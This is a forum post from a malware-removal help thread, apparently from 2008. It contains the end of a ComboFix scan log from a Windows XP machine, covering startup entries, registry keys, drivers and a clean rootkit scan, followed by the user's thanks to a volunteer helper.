C:\Documents and Settings\n\Start Menu\Programs\Startup\
LimeWire On Startup.lnk - C:\Program Files\LimeWire\LimeWire.exe [2008-04-18 21:21:09 147456]

C:\Documents and Settings\All Users\Start Menu\Programs\Startup\
Adobe Reader Speed Launch.lnk - C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe [2006-10-23 02:48:20 40048]
Adobe Reader Synchronizer.lnk - C:\Program Files\Adobe\Reader 8.0\Reader\AdobeCollabSync.exe [2006-10-23 01:01:50 734872]
AudioDeck.lnk - C:\Program Files\VIA Technologies, Inc\VIA Audio Driver Setup Program\AudioDeck\AudioDeck.exe [2002-03-18 11:13:06 581632]
Remote Controller.lnk - C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVRMVCR.EXE [2002-03-18 11:37:43 102400]
Scheduler.lnk - C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVSCHL.EXE [2002-03-18 11:37:43 118784]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"VIDC.AP41"= APmpg4v1.dll
"vidc.DIV3"= DivXc32.dll
"msacm.divxa32"= DivXa32.acm
"vidc.DIV4"= DivXc32f.dll
"VIDC.ACDV"= ACDV.dll
"VIDC.XFR1"= xfcodec.dll

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\PowerS]
--a------ 2001-08-03 18:56 159800 C:\WINDOWS\PowerS.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RaidTool]
--------- 2004-10-11 08:54 589824 C:\Program Files\VIA\RAID\raid_tool.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Yahoo! Pager]
--a------ 2007-08-30 17:43 4670704 C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\services]
"WZCSVC"=2 (0x2)
"SSDPSRV"=3 (0x3)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall"= 0 (0x0)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"C:\\Program Files\\Messenger\\msmsgs.exe"=
"C:\\Program Files\\eMule\\emule.exe"=
"C:\\Program Files\\Yahoo!\\Messenger\\YahooMessenger.exe"=
"C:\\Program Files\\Yahoo!\\Messenger\\YServer.exe"=
"C:\\Program Files\\LimeWire\\LimeWire.exe"=
"C:\\Program Files\\Evil Msn\\Evil Msn 3.0.exe"=
"C:\\Program Files\\BearShare Applications\\BearShare\\BearShare.exe"=
"C:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe"=
"C:\\Program Files\\Windows Live\\Messenger\\livecall.exe"=
"C:\\Program Files\\Xfire\\xfire.exe"=

R0 videX32;videX32;C:\WINDOWS\system32\DRIVERS\videX32.sys [2006-02-23 12:38]
R2 BT878;BtCap, WDM Video Capture;C:\WINDOWS\system32\drivers\BT878.SYS [2004-04-07 22:30]
R2 BTTUNER;BtTuner, WDM TV Tuner;C:\WINDOWS\system32\drivers\BTTUNER.SYS [2004-04-07 22:30]
R2 BTXBAR;BtXBar, WDM Crossbar;C:\WINDOWS\system32\drivers\BTXBAR.SYS [2004-04-07 22:30]
R3 usnjsvc;Usluga Messenger Sharing Folders USN Journal Reader;"C:\Program Files\Windows Live\Messenger\usnsvc.exe" [2007-10-18 11:31]
S3 CV2K1;CommView Network Monitor;C:\WINDOWS\system32\DRIVERS\cv2k1.sys []
S3 Vsp;Vsp;C:\WINDOWS\system32\drivers\Vsp.sys [2003-05-27 17:45]

.
Contents of the 'Scheduled Tasks' folder
"2008-04-07 15:45:53 C:\WINDOWS\Tasks\AppleSoftwareUpdate.job"
- C:\Program Files\Apple Software Update\SoftwareUpdate.exe
"2008-03-11 17:00:00 C:\WINDOWS\Tasks\Pareto UNS.job"
- C:\Program Files\Common Files\ParetoLogic\UUS\UUS.dll\Pareto_Update.exe
.
**************************************************************************

catchme 0.3.1361 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2008-06-03 17:46:07
Windows 5.1.2600 Service Pack 2 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

scan completed successfully
hidden files: 0

**************************************************************************
.
Completion time: 2008-06-03 17:47:30
ComboFix-quarantined-files.txt  2008-06-03 15:47:23
ComboFix2.txt  2008-06-03 12:05:43
ComboFix3.txt  2008-06-02 19:53:06

Pre-Run: 29,154,091,008 bytes free
Post-Run: 29,144,064,000 bytes free

180   --- E O F ---   2008-05-16 20:47:53


Hey bro, thanks a lot, the computer works perfectly now.

  • dr_Bora  Male
  • Anti Malware Fighter
    Rank 2
  • Joined: 24 Jul 2007
  • Posts: 12280
  • Where do you live: Höganäs, SE
